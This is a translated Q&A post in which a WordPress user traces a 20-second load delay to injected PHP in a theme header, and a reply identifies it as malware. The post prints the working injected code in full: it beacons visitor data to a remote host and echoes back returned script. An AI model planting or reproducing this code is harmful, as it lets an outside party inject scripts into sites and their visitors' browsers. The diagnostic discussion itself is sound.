这段代码想要做什么?这就是我20多岁TTFB的原因

时间:2019-01-30 作者:kwacky1

在神话般的帮助下,我正在为Wordpress主题排除20-30秒的TTFB故障Query Monitor.

我能够将原因缩小到以下代码:

#e0e950#
error_reporting(0); @ini_set(\'display_errors\',0); $wp_s15 = @$_SERVER[\'HTTP_USER_AGENT\']; if (( preg_match (\'/Gecko|MSIE/i\', $wp_s15) && !preg_match (\'/bot/i\', $wp_s15))){
$wp_s0915="http://"."https"."http".".com/"."http/?ip=".$_SERVER[\'REMOTE_ADDR\']."&referer=".urlencode($_SERVER[\'HTTP_HOST\'])."&ua=".urlencode($wp_s15);
if (function_exists(\'curl_init\') && function_exists(\'curl_exec\')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_s0915); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_15s = curl_exec ($ch); curl_close($ch);} elseif (function_exists(\'file_get_contents\') && @ini_get(\'allow_url_fopen\')) {$wp_15s = @file_get_contents($wp_s0915);}
elseif (function_exists(\'fopen\') && function_exists(\'stream_get_contents\')) {$wp_15s=@stream_get_contents(@fopen($wp_s0915, "r"));}}
if (substr($wp_15s,1,3) === \'scr\'){ echo $wp_15s; }
#/e0e950#
由于curl请求的20秒超时值,TTFB的原因现在变得很明显。但为什么这个代码甚至存在于模板头中呢。php到底在做什么?

1 个回复
最合适的回答,由SO网友:Krzysiek Dróżdż 整理而成

很可能是某种恶意代码。

它所做的是:

禁用错误报告检查从远程服务器获取内容的可用方法将请求发送到远程服务器在您的站点上显示该请求的结果,因此这是一种垃圾邮件SEO链接或类似的内容。

不,你的网站上不应该有这样的代码,如果有,很可能是恶意软件感染的结果。

相关推荐

Custom term templates

所以,我在网上做了一些研究,但没有找到可靠的答案,所以我来了。我需要为特定类别创建自定义woocommerce类别页面。例如,我有一个类别叫做“Awesome”。而不是使用由短代码生成的常规类别页面[product_category category=\"something\"], 我想为自定义特定类别页面Awesome.我发现我需要编辑taxonomy-product_cat.php 但我不知道如何将其链接到名为awesome.换句话说,我正在考虑制作php文件的自定义副本,然后将其添加为主题templ